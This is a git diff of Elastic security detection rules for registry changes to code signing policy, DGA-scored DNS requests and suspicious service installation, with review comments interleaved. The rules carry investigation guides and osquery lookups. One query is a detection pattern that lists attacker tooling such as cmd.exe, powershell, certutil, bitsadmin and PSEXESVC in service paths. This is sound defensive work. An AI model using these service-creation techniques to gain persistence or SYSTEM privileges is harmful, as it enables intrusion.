The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", "related_integrations": [ { @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_7.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_7.json new file mode 100644 index 00000000000..07b62df1edc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_7.json 
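Review bot: The investigation guide on the `+ "note"` line tells the analyst this activity "should not happen legitimately", yet the key the query watches lives under `HKEY_USERS\*\Software\Policies\...`, the location Group Policy uses for per-user policy settings, so a hit whose writing process is the Group Policy client most likely means a GPO is pushing `BehaviorOnFailedVerify` = 0/1 to every user in its scope and the guide should direct the analyst to that GPO, not only to the local host. Suggest adding under "Possible investigation steps": `- If the value was written by Group Policy processing, identify the GPO that sets it and treat every host/user in that GPO's scope as affected.` The remediation step that relies on `Remove-Service` also needs a caveat, since that cmdlet exists only in PowerShell 6+; on Windows PowerShell 5.1 the equivalent is `sc.exe delete <service>`. As far as I can tell this value governs the per-user unsigned driver *installation* behavior (ignore/warn/block) rather than kernel-mode Driver Signature Enforcement itself, so the "can disable DSE" phrasing may overstate what the change achieves — worth confirming before the text is reused. The same note text is duplicated verbatim in the _4 and _5 snapshots and in the new _7 version whose hunk starts at the end of this chunk; since _4–_6 are frozen prior versions, the wording fix belongs in the _7 file.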
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Code Signing Policy Modification Through Registry", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. 
The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\" and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.006", + "name": "Code 
Signing Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1553/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_1.json b/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_1.json index 96f40a6e941..e9c9ab13d87 100644 --- a/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_1.json +++ b/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_1.json @@ -13,7 +13,7 @@ "license": "Elastic License v2", "name": "Machine Learning Detected a DNS Request With a High DGA Probability Score", "note": "", - "query": "ml_is_dga.malicious_probability \u003e 0.98\n", + "query": "ml_is_dga.malicious_probability > 0.98\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", "https://docs.elastic.co/en/integrations/dga" @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_4.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_4.json index 36f33b2c05f..8e3ef2a10b2 100644 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_4.json +++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_4.json 
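Review bot: The investigation guide in this new rule file frames the detection as catching modifications that disable kernel Driver Signature Enforcement, but the query only matches the user-hive `HKEY_USERS\*\Software\Policies\Microsoft\Windows NT\Driver Signing\BehaviorOnFailedVerify` value being set to 0 or 1, which as far as I know is the legacy "Code signing for device drivers" installation policy (Ignore/Warn/Block) rather than the kernel-mode code integrity setting DSE enforces. A responder reading `This rule identifies registry modifications that can disable DSE.` could conclude kernel DSE was switched off when only the install-time signature policy was weakened, so that sentence in `note` (and the matching `description`) should say what is actually observed, e.g. `This rule identifies changes to the per-user driver-signing installation policy that weaken signature verification; it does not observe kernel-mode code integrity settings.` The same guide text appears in the preceding hunk, whose file header is outside this view, so the wording fix belongs in the rule's upstream source rather than in these exported JSON artifacts. The hunk is the complete new file, so nothing is cut off.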
@@ -49,7 +49,7 @@
 ],
 "risk_score": 47,
 "rule_id": "da87eee1-129c-4661-a7aa-57d0b9645fad",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_5.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_5.json
index 6518b0f3d14..00f6e82d3dc 100644
--- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_5.json
+++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_5.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "da87eee1-129c-4661-a7aa-57d0b9645fad",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_6.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_6.json
index 04240f1ab14..235a3a82179 100644
--- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_6.json
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Service was Installed in the System", - "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON 
drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON 
drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n - Retrieve the referenced files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n\n### False positive analysis\n\n- Certain services such as PSEXECSVC may happen legitimately. The security team should address any potential benign true positive (B-TP) by excluding the relevant FP by pattern.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "any where\n (event.code : \"4697\" and\n (winlog.event_data.ServiceFileName : \n (\"*COMSPEC*\", \"*\\\\172.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\", \n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\", \n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\") or\n winlog.event_data.ServiceFileName regex~ \"\"\"%systemroot%\\\\[a-z0-9]+\\.exe\"\"\")) or\n\n (event.code : \"7045\" and\n winlog.event_data.ImagePath : (\n \"*COMSPEC*\", \"*\\\\172.0.0.1*\", \"*Admin$*\", \"*powershell*\", \"*rundll32*\", \"*cmd.exe*\", \"*PSEXESVC*\",\n \"*echo*\", \"*RemComSvc*\", \"*.bat*\", \"*.cmd*\", \"*certutil*\", \"*vssadmin*\", \"*certmgr*\", \"*bitsadmin*\",\n \"*\\\\Users\\\\*\", \"*\\\\Windows\\\\Temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\PerfLogs\\\\*\", \"*\\\\Windows\\\\Debug\\\\*\",\n \"*regsvr32*\", \"*msbuild*\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_7.json b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_7.json index 096425967fd..43fbdd56f5e 100644 --- a/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_7.json 
+++ b/packages/security_detection_engine/kibana/security_rule/da87eee1-129c-4661-a7aa-57d0b9645fad_7.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Service was Installed in the System", - "note": "## Triage and analysis\n\n### Investigating Suspicious Service was Installed in the System\n\nAttackers may create new services to execute system shells and other command execution utilities to elevate their privileges from administrator to SYSTEM. They can also configure services to execute these utilities with persistence payloads.\n\nThis rule looks for suspicious services being created with suspicious traits compatible with the above behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify how the service was created or modified. 
Look for registry changes events or Windows events related to service activities (for example, 4697 and/or 7045).\n - Examine the created and existent services, the executables or drivers referenced, and command line arguments for suspicious entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON 
